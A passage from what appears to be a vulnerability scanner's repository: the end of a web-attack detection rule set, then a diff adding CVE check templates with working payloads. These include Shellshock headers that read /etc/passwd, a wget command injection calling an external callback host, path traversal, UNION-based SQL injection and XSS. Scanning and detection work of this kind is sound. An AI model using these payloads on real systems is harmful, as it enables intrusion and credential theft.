1/2","tags":["sqli","id","lfi"],"impact":6},{"id":43,"rule":"(?:\"\\s*\\*.+(?:or|id)\\W*\"\\d)|(?:\\^\")|(?:^[\\w\\s\"-]+(?<=and\\s)(?<=or\\s)(?<=xor\\s)(?<=nand\\s)(?<=not\\s)(?<=\\|\\|)(?<=\\&\\&)\\w+\\()|(?:\"[\\s\\d]*[^\\w\\s]+\\W*\\d\\W*.*[\"\\d])|(?:\"\\s*[^\\w\\s?]+\\s*[^\\w\\s]+\\s*\")|(?:\"\\s*[^\\w\\s]+\\s*[\\W\\d].*(?:#|--))|(?:\".*\\*\\s*\\d)|(?:\"\\s*or\\s[^\\d]+[\\w-]+.*\\d)|(?:[()*<>%+-][\\w-]+[^\\w\\s]+\"[^,])","description":"Detects classic SQL injection probings 2/2","tags":["sqli","id","lfi"],"impact":6},{"id":44,"rule":"(?:\\d\"\\s+\"\\s+\\d)|(?:^admin\\s*\"|(\\/\\*)+\"+\\s?(?:--|#|\\/\\*|{)?)|(?:\"\\s*or[\\w\\s-]+\\s*[+<>=(),-]\\s*[\\d\"])|(?:\"\\s*[^\\w\\s]?=\\s*\")|(?:\"\\W*[+=]+\\W*\")|(?:\"\\s*[!=|][\\d\\s!=+-]+.*[\"(].*$)|(?:\"\\s*[!=|][\\d\\s!=]+.*\\d+$)|(?:\"\\s*like\\W+[\\w\"(])|(?:\\sis\\s*0\\W)|(?:where\\s[\\s\\w\\.,-]+\\s=)|(?:\"[<>~]+\")","description":"Detects basic SQL authentication bypass attempts 1/3","tags":["sqli","id","lfi"],"impact":7},{"id":45,"rule":"(?:union\\s*(?:all|distinct|[(!@]*)\\s*[([]*\\s*select)|(?:\\w+\\s+like\\s+\\\")|(?:like\\s*\"\\%)|(?:\"\\s*like\\W*[\"\\d])|(?:\"\\s*(?:n?and|x?or|not\\s|\\|\\||\\&\\&)\\s+[\\s\\w]+=\\s*\\w+\\s*having)|(?:\"\\s*\\*\\s*\\w+\\W+\")|(?:\"\\s*[^?\\w\\s=.,;)(]+\\s*[(@\"]*\\s*\\w+\\W+\\w)|(?:select\\s*[\\[\\]()\\s\\w\\.,\"-]+from)|(?:find_in_set\\s*\\()","description":"Detects basic SQL authentication bypass attempts 2/3","tags":["sqli","id","lfi"],"impact":7},{"id":46,"rule":"(?:in\\s*\\(+\\s*select)|(?:(?:n?and|x?or|not\\s|\\|\\||\\&\\&)\\s+[\\s\\w+]+(?:regexp\\s*\\(|sounds\\s+like\\s*\"|[=\\d]+x))|(\"\\s*\\d\\s*(?:--|#))|(?:\"[%&<>^=]+\\d\\s*(=|or))|(?:\"\\W+[\\w+-]+\\s*=\\s*\\d\\W+\")|(?:\"\\s*is\\s*\\d.+\"?\\w)|(?:\"\\|?[\\w-]{3,}[^\\w\\s.,]+\")|(?:\"\\s*is\\s*[\\d.]+\\s*\\W.*\")","description":"Detects basic SQL authentication bypass attempts 3/3","tags":["sqli","id","lfi"],"impact":7},{"id":47,"rule":"(?:[\\d\\W]\\s+as\\s*[\"\\w]+\\s*from)|(?:^[\\W\\d]+\\s*(?:union|select|create|rename|truncate|load|alter|delete|update|insert|desc))|(?:(?:select|create|rename|truncate|load|alter|delete|update|insert|desc)\\s+(?:(?:group_)concat|char|load_file)\\s?\\(?)|(?:end\\s*\\);)|(\"\\s+regexp\\W)|(?:[\\s(]load_file\\s*\\()","description":"Detects concatenated basic SQL injection and SQLLFI attempts","tags":["sqli","id","lfi"],"impact":5},{"id":48,"rule":"(?:@.+=\\s*\\(\\s*select)|(?:\\d+\\s*or\\s*\\d+\\s*[\\-+])|(?:\\/\\w+;?\\s+(?:having|and|or|select)\\W)|(?:\\d\\s+group\\s+by.+\\()|(?:(?:;|#|--)\\s*(?:drop|alter))|(?:(?:;|#|--)\\s*(?:update|insert)\\s*\\w{2,})|(?:[^\\w]SET\\s*@\\w+)|(?:(?:n?and|x?or|not\\s|\\|\\||\\&\\&)[\\s(]+\\w+[\\s)]*[!=+]+[\\s\\d]*[\"=()])","description":"Detects chained SQL injection attempts 1/2","tags":["sqli","id"],"impact":6},{"id":49,"rule":"(?:\"\\s+and\\s*=\\W)|(?:\\(\\s*select\\s*\\w+\\s*\\()|(?:\\*\\/from)|(?:\\+\\s*\\d+\\s*\\+\\s*@)|(?:\\w\"\\s*(?:[-+=|@]+\\s*)+[\\d(])|(?:coalesce\\s*\\(|@@\\w+\\s*[^\\w\\s])|(?:\\W!+\"\\w)|(?:\";\\s*(?:if|while|begin))|(?:\"[\\s\\d]+=\\s*\\d)|(?:order\\s+by\\s+if\\w*\\s*\\()|(?:[\\s(]+case\\d*\\W.+[tw]hen[\\s(])","description":"Detects chained SQL injection attempts 2/2","tags":["sqli","id"],"impact":6},{"id":50,"rule":"(?:(select|;)\\s+(?:benchmark|if|sleep)\\s*?\\(\\s*\\(?\\s*\\w+)","description":"Detects SQL benchmark and sleep injection attempts including conditional queries","tags":["sqli","id"],"impact":4},{"id":51,"rule":"(?:create\\s+function\\s+\\w+\\s+returns)|(?:;\\s*(?:select|create|rename|truncate|load|alter|delete|update|insert|desc)\\s*[\\[(]?\\w{2,})","description":"Detects MySQL UDF injection and other data/structure manipulation attempts","tags":["sqli","id"],"impact":6},{"id":52,"rule":"(?:alter\\s*\\w+.*character\\s+set\\s+\\w+)|(\";\\s*waitfor\\s+time\\s+\")|(?:\";.*:\\s*goto)","description":"Detects MySQL charset switch and MSSQL DoS attempts","tags":["sqli","id"],"impact":6},{"id":53,"rule":"(?:procedure\\s+analyse\\s*\\()|(?:;\\s*(declare|open)\\s+[\\w-]+)|(?:create\\s+(procedure|function)\\s*\\w+\\s*\\(\\s*\\)\\s*-)|(?:declare[^\\w]+[@#]\\s*\\w+)|(exec\\s*\\(\\s*@)","description":"Detects MySQL and PostgreSQL stored procedure/function injections","tags":["sqli","id"],"impact":7},{"id":54,"rule":"(?:select\\s*pg_sleep)|(?:waitfor\\s*delay\\s?\"+\\s?\\d)|(?:;\\s*shutdown\\s*(?:;|--|#|\\/\\*|{))","description":"Detects Postgres pg_sleep injection, waitfor delay attacks and database shutdown attempts","tags":["sqli","id"],"impact":5},{"id":55,"rule":"(?:\\sexec\\s+xp_cmdshell)|(?:\"\\s*!\\s*[\"\\w])|(?:from\\W+information_schema\\W)|(?:(?:(?:current_)?user|database|schema|connection_id)\\s*\\([^\\)]*)|(?:\";?\\s*(?:select|union|having)\\s*[^\\s])|(?:\\wiif\\s*\\()|(?:exec\\s+master\\.)|(?:union\\sselect\\s@)|(?:union[\\w(\\s]*select)|(?:select.*\\w?user\\()|(?:into[\\s+]+(?:dump|out)file\\s*\")","description":"Detects MSSQL code execution and information gathering attempts","tags":["sqli","id"],"impact":5},{"id":56,"rule":"(?:merge.*using\\s*\\()|(execute\\s*immediate\\s*\")|(?:\\W+\\d*\\s*having\\s*[^\\s\\-])|(?:match\\s*[\\w(),+-]+\\s*against\\s*\\()","description":"Detects MATCH AGAINST, MERGE, EXECUTE IMMEDIATE and HAVING injections","tags":["sqli","id"],"impact":5},{"id":57,"rule":"(?:,.*[)\\da-f\"]\"(?:\".*\"|\\Z|[^\"]+))|(?:\\Wselect.+\\W*from)|((?:select|create|rename|truncate|load|alter|delete|update|insert|desc)\\s*\\(\\s*space\\s*\\()","description":"Detects MySQL comment-/space-obfuscated injections and backtick termination","tags":["sqli","id"],"impact":5},{"id":58,"rule":"(?:@[\\w-]+\\s*\\()|(?:]\\s*\\(\\s*[\"!]\\s*\\w)|(?:<[?%](?:php)?.*(?:[?%]>)?)|(?:;[\\s\\w|]*\\$\\w+\\s*=)|(?:\\$\\w+\\s*=(?:(?:\\s*\\$?\\w+\\s*[(;])|\\s*\".*\"))|(?:;\\s*\\{\\W*\\w+\\s*\\()","description":"Detects code injection attempts 1/3","tags":["id","rfe","lfi"],"impact":7},{"id":59,"rule":"(?:(?:[;]+|(<[?%](?:php)?)).*(?:define|eval|file_get_contents|include|require|require_once|set|shell_exec|phpinfo|system|passthru|preg_\\w+|execute)\\s*[\"(@])","description":"Detects code injection attempts 2/3","tags":["id","rfe","lfi"],"impact":7},{"id":60,"rule":"(?:(?:[;]+|(<[?%](?:php)?)).*[^\\w](?:echo|print|print_r|var_dump|[fp]open))|(?:;\\s*rm\\s+-\\w+\\s+)|(?:;.*{.*\\$\\w+\\s*=)|(?:\\$\\w+\\s*\\[\\]\\s*=\\s*)","description":"Detects code injection attempts 3/3","tags":["id","rfe","lfi"],"impact":7},{"id":62,"rule":"(?:function[^(]*\\([^)]*\\))|(?:(?:delete|void|throw|instanceof|new|typeof)[^\\w.]+\\w+\\s*[([])|([)\\]]\\s*\\.\\s*\\w+\\s*=)|(?:\\(\\s*new\\s+\\w+\\s*\\)\\.)","description":"Detects common function declarations and special JS operators","tags":["id","rfe","lfi"],"impact":5},{"id":63,"rule":"(?:[\\w.-]+@[\\w.-]+%(?:[01][\\db-ce-f])+\\w+:)","description":"Detects common mail header injections","tags":["id","spam"],"impact":5},{"id":64,"rule":"(?:\\.pl\\?\\w+=\\w?\\|\\w+;)|(?:\\|\\(\\w+=\\*)|(?:\\*\\s*\\)+\\s*;)","description":"Detects perl echo shellcode injection and LDAP vectors","tags":["lfi","rfe"],"impact":5},{"id":65,"rule":"(?:(^|\\W)const\\s+[\\w\\-]+\\s*=)|(?:(?:do|for|while)\\s*\\([^;]+;+\\))|(?:(?:^|\\W)on\\w+\\s*=[\\w\\W]*(?:on\\w+|alert|eval|print|confirm|prompt))|(?:groups=\\d+\\(\\w+\\))|(?:(.)\\1{128,})","description":"Detects basic XSS DoS attempts","tags":["rfe","dos"],"impact":5},{"id":67,"rule":"(?:\\({2,}\\+{2,}:{2,})|(?:\\({2,}\\+{2,}:+)|(?:\\({3,}\\++:{2,})|(?:\\$\\[!!!\\])","description":"Detects unknown attack vectors based on PHPIDS Centrifuge detection","tags":["xss","csrf","id","rfe","lfi"],"impact":7},{"id":68,"rule":"(?:[\\s\\/\"]+[-\\w\\/\\\\\\*]+\\s*=.+(?:\\/\\s*>))","description":"Finds attribute breaking injections including obfuscated attributes","tags":["xss","csrf"],"impact":4},{"id":69,"rule":"(?:(?:msgbox|eval)\\s*\\+|(?:language\\s*=\\*vbscript))","description":"Finds basic VBScript injection attempts","tags":["xss","csrf"],"impact":4},{"id":70,"rule":"(?:\\[\\$(?:ne|eq|lte?|gte?|n?in|mod|all|size|exists|type|slice|or)\\])","description":"Finds basic MongoDB SQL injection attempts","tags":["sqli"],"impact":4},{"id":71,"rule":"(?:[\\s\\d\\/\"]+(?:on\\w+|style|poster|background)=[$\"\\w])|(?:-type\\s*:\\s*multipart)","description":"finds malicious attribute injection attempts and MHTML attacks","tags":["xss","csrf"],"impact":6},{"id":72,"rule":"(?:(sleep\\((\\s*)(\\d*)(\\s*)\\)|benchmark\\((.*)\\,(.*)\\)))","description":"Detects blind sqli tests using sleep() or benchmark().","tags":["sqli","id"],"impact":4},{"id":73,"rule":"(?:(\\%SYSTEMROOT\\%))","description":"An attacker is trying to locate a file to read or write.","tags":["files","id"],"impact":4},{"id":75,"rule":"(?:(((.*)\\%[c|d|i|e|f|g|o|s|u|x|p|n]){8}))","description":"Looking for a format string attack","tags":["format string"],"impact":4},{"id":76,"rule":"(?:(union(.*)select(.*)from))","description":"Looking for basic sql injection. Common attack string for mysql, oracle and others.","tags":["sqli","id"],"impact":3},{"id":77,"rule":"(?:^(-0000023456|4294967295|4294967296|2147483648|2147483647|0000012345|-2147483648|-2147483649|0000023456|2.2250738585072007e-308|1e309)$)","description":"Looking for intiger overflow attacks, these are taken from skipfish, except 2.2250738585072007e-308 is the \"magic number\" crash","tags":["sqli","id"],"impact":3},{"id":78,"rule":"(?:%23.*?%0A)","description":"Detects SQL comment filter evasion","tags":["format string"],"impact":10},{"id":79,"rule":"((burpcollaborator|pipedream)\\.net|(canarytokens|requestrepo)\\.com|oast\\.(online|(liv|sit|m)e|fun|pro)|\\.ngrok(\\-free\\.(app|dev)|\\.((app|io)|dev)))","description":"Detects out-of-band (OOB) interaction or Server-Side Request Forgery (SSRF) attack attempts","tags":["ssrf","oob"],"impact":10},{"id":80,"rule":"(?i)(?:on(?:webkitanimationiteration|(?:(?:webkitanimation|(?:select|drag))s|t(?:ransition|ouch)s)tart|(?:webkit(?:transi|anima)tione|t(?:ransition|ouch)e|scrolle)nd|(?:beforescriptexecut|afterscriptexecut|(?:p(?:ointerrawupda|(?:opsta|as))|timeupda)t|b(?:eforetoggl|ounc)|(?:pointer|drag)leav|(?:pointer|touch)mov|mouse(?:lea|mo)v|pa(?:gehid|us)|resiz|clos)e|(?:mozfullscreen|fullscreen|(?:selec|dura)tion|hash|cue)change|unhandledrejection|a(?:nimation(?:iteration|cancel|start|end)|fterprint|uxclick)|transitioncancel|toggle\\(popover\\)|loaded(?:meta)?data|(?:canplaythroug|searc)h|(?:transitionru|(?:pointer|key)dow|mousedow|(?:focus|beg)i)n|pointerenter|(?:beforeunloa|invali|(?:seek|end)e|unloa)d|volumechange|c(?:(?:ontextmenu|ut)|opy)|(?:pointerov|drag(?:ent|ov))er|(?:(?:beforeinp|focuso)u|beforeprin|pointerou|beforecu|mouseou|submi|re(?:pea|se)|inpu)t|beforecopy|mouse(?:enter|over|up)|(?:mouse)?wheel|ratechange|(?:pointeru|keyu|dro)p|pageshow|progress|keypress|dblclick|canplay|dragend|playing|s(?:eeking|how)|message|s(?:croll|elect)|toggle|finish|change|focus|(?:erro|blu)r|click|start|drag|load|play|end))\\s*?=","description":"Detects common event attributes and properties","tags":["xss","csrf","id","rfe"],"impact":6}]}
diff --git a/db/cves.json b/db/cves.json
new file mode 100644
index 00000000..3cbd04a6
--- /dev/null
+++ b/db/cves.json
@@ -0,0 +1 @@
+{"templates":[{"id":"CVE-2014-4536","info":{"name":"Infusionsoft Gravity Forms Add-on < 1.5.7 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/infusionsoft/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["Infusionsoft","Tags:"],"condition":"and","case-insensitive":true}]},{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/infusionsoft/Infusionsoft/tests/notAuto_test_ContactService_pauseCampaign.php?go=go%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&contactId=contactId%27%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&campaignId=campaignId%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"></script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-9444","info":{"name":"Frontend Uploader <= 0.9.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/?page_id=0&&errors[fu-disallowed-mime-type][0][name]=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-4210","info":{"name":"Oracle Weblogic - Server-Side Request Forgery","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/uddiexplorer/SearchPublicRegistries.jsp?rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search&operator=http://{{interactsh-url}}"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"body","words":["Search public registries"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-5111","info":{"name":"Fonality trixbox - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/maint/modules/endpointcfg/endpointcfg.php?lang=../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-8682","info":{"name":"Gogs (Go Git Service) - SQL Injection","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/api/v1/repos/search?q=%27)%09UNION%09SELECT%09*%09FROM%09(SELECT%09null)%09AS%09a1%09%09JOIN%09(SELECT%091)%09as%09u%09JOIN%09(SELECT%09user())%09AS%09b1%09JOIN%09(SELECT%09user())%09AS%09b2%09JOIN%09(SELECT%09null)%09as%09a3%09%09JOIN%09(SELECT%09null)%09as%09a4%09%09JOIN%09(SELECT%09null)%09as%09a5%09%09JOIN%09(SELECT%09null)%09as%09a6%09%09JOIN%09(SELECT%09null)%09as%09a7%09%09JOIN%09(SELECT%09null)%09as%09a8%09%09JOIN%09(SELECT%09null)%09as%09a9%09JOIN%09(SELECT%09null)%09as%09a10%09JOIN%09(SELECT%09null)%09as%09a11%09JOIN%09(SELECT%09null)%09as%09a12%09JOIN%09(SELECT%09null)%09as%09a13%09%09JOIN%09(SELECT%09null)%09as%09a14%09%09JOIN%09(SELECT%09null)%09as%09a15%09%09JOIN%09(SELECT%09null)%09as%09a16%09%09JOIN%09(SELECT%09null)%09as%09a17%09%09JOIN%09(SELECT%09null)%09as%09a18%09%09JOIN%09(SELECT%09null)%09as%09a19%09%09JOIN%09(SELECT%09null)%09as%09a20%09%09JOIN%09(SELECT%09null)%09as%09a21%09%09JOIN%09(SELECT%09null)%09as%09a22%09where%09(%27%25%27=%27"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"ok\":true","\"data\"","\"repolink\":\""],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-9615","info":{"name":"Netsweeper 4.0.4 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/webadmin/deny/index.php?dpid=1&dpruleid=1&cat=1&ttl=5018400&groupname=<group_name_eg_netsweeper_student_allow_internet_access&policyname=auto_created&username=root&userip=127.0.0.1&connectionip=127.0.0.1&nsphostname=netsweeper&url=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-3206","info":{"name":"Seagate BlackArmor NAS - Command Injection","severity":"critical"},"requests":[{"raw":["GET /backupmgt/localJob.php?session=fail;wget+http://{{interactsh-url}}; HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\n","GET /backupmgt/pre_connect_check.php?auth_name=fail;wget+http://{{interactsh-url}}; HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\n"],"matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]}]}]},{"id":"CVE-2014-9617","info":{"name":"Netsweeper 3.0.6 - Open Redirection","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/remotereporter/load_logfiles.php?server=127.0.0.1&url=https://interact.sh/"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?://|//)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh.*$"]}]}]},{"id":"CVE-2014-6287","info":{"name":"HTTP File Server <2.3c - Remote Command Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/?search==%00{.cookie|{{str1}}|value%3d{{str2}}.}"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<title>HFS /</title>"]},{"type":"word","part":"header","words":["Set-Cookie: {{str1}}={{str2}};","text/html"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-4513","info":{"name":"ActiveHelper LiveHelp Server 3.1.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/activehelper-livehelp/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["ActiveHelper LiveHelp Live Chat"]}]},{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/activehelper-livehelp/server/offline.php?MESSAGE=MESSAGE%3C%2Ftextarea%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&DOMAINID=DOMAINID&COMPLETE=COMPLETE&TITLE=TITLE&URL=URL&COMPANY=COMPANY&SERVER=SERVER&PHONE=PHONE&SECURITY=SECURITY&BCC=BCC&EMAIL=EMAIL%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&NAME=NAME%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</textarea></script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-2323","info":{"name":"Lighttpd 1.4.34 SQL Injection and Path Traversal","severity":"critical"},"requests":[{"raw":["GET /etc/passwd HTTP/1.1\nHost: [::1]' UNION SELECT '/\n\n"],"unsafe":true,"matchers":[{"type":"regex","regex":["root:[x*]:0:0:"]}]}]},{"id":"CVE-2014-6308","info":{"name":"Osclass Security Advisory 3.4.1 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/osclass/oc-admin/index.php?page=appearance&action=render&file=../../../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-6271","info":{"name":"ShellShock - Remote Code Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}{{paths}}"],"payloads":{"paths":["","/cgi-bin/status","/cgi-bin/stats","/cgi-bin/test","/cgi-bin/status/status.cgi","/test.cgi","/debug.cgi","/cgi-bin/test-cgi","/cgi-bin/test.cgi"]},"stop-at-first-match":true,"headers":{"Shellshock":"() { ignored; }; echo Content-Type: text/html; echo ; /bin/cat /etc/passwd ","Referer":"() { ignored; }; echo Content-Type: text/html; echo ; /bin/cat /etc/passwd ","Cookie":"() { ignored; }; echo Content-Type: text/html; echo ; /bin/cat /etc/passwd "},"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-4539","info":{"name":"Movies <= 0.6 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/movies/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["Movies =","Tags:"],"condition":"and"}]},{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/movies/getid3/demos/demo.mimeonly.php?filename=filename%27%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["'><script>alert(document.cookie)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-9608","info":{"name":"Netsweeper 4.0.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/webadmin/policy/group_table_ajax.php/%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["webadminU=","webadmin="],"condition":"or"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-8799","info":{"name":"WordPress Plugin DukaPress 2.5.2 - Directory Traversal","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/dukapress/lib/dp_image.php?src=../../../../wp-config.php"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["DB_NAME","DB_PASSWORD","DB_USER","DB_HOST"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-3744","info":{"name":"Node.js st module Directory Traversal","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/public/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-9618","info":{"name":"Netsweeper - Authentication Bypass","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/webadmin/clientlogin/?srid=&action=showdeny&url="],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["name=formtag action=\"../clientlogin/?srid=&action=showdeny&url=\"","placeholder=\"Profile Manager\">","<title>Netsweeper WebAdmin</title>"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-4940","info":{"name":"WordPress Plugin Tera Charts - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/tera-charts/charts/zoomabletreemap.php?fn=../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-4558","info":{"name":"WooCommerce Swipe <= 2.7.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}"],"matchers":[{"type":"word","internal":true,"words":["/wp-content/plugins/swipehq-payment-gateway-woocommerce/"]}]},{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/swipehq-payment-gateway-woocommerce/test-plugin.php?api_url=api_url%27%3E%3Cscript%3Ealert%28document.domain%29%3C/script%3E "],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["'><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-2908","info":{"name":"Siemens SIMATIC S7-1200 CPU - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/Portal/Portal.mwsl?PriNav=Bgz&filtername=Name&filtervalue=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&Send=Filter"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-2383","info":{"name":"Dompdf < v0.6.0 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}{{paths}}"],"payloads":{"paths":["/dompdf.php?input_file=php://filter/resource=/etc/passwd","/PhpSpreadsheet/Writer/PDF/DomPDF.php?input_file=php://filter/resource=/etc/passwd","/lib/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd","/includes/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd","/wp-content/plugins/web-portal-lite-client-portal-secure-file-sharing-private-messaging/includes/libs/pdf/dompdf.php?input_file=php://filter/resource=/etc/passwd","/wp-content/plugins/buddypress-component-stats/lib/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd","/wp-content/plugins/abstract-submission/dompdf-0.5.1/dompdf.php?input_file=php://filter/resource=/etc/passwd","/wp-content/plugins/post-pdf-export/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd","/wp-content/plugins/blogtopdf/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd","/wp-content/plugins/gboutique/library/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd","/wp-content/plugins/wp-ecommerce-shop-styling/includes/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd"]},"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["application/pdf","filename=\"dompdf_out.pdf\""],"condition":"and"},{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-4561","info":{"name":"Ultimate Weather Plugin <= 1.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/ultimate-weather-plugin/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["Ultimate Weather","Tags:"],"condition":"and"}]},{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/ultimate-weather-plugin/magpierss/scripts/magpie_debug.php?url=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-9609","info":{"name":"Netsweeper 4.0.8 - Directory Traversal","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/webadmin/reporter/view_server_log.php?act=stats&filename=log&offset=1&count=1&sortorder=0&filter=0&log=../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-4535","info":{"name":"Import Legacy Media <= 0.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}"],"matchers":[{"type":"word","internal":true,"words":["/wp-content/plugins/import-legacy-media/"]}]},{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/import-legacy-media/getid3/demos/demo.mimeonly.php?filename=filename%27%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["'></script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-9614","info":{"name":"Netsweeper 4.0.5 - Default Weak Account","severity":"critical"},"requests":[{"raw":["POST /webadmin/auth/verification.php HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{BaseURL}}\nReferer: 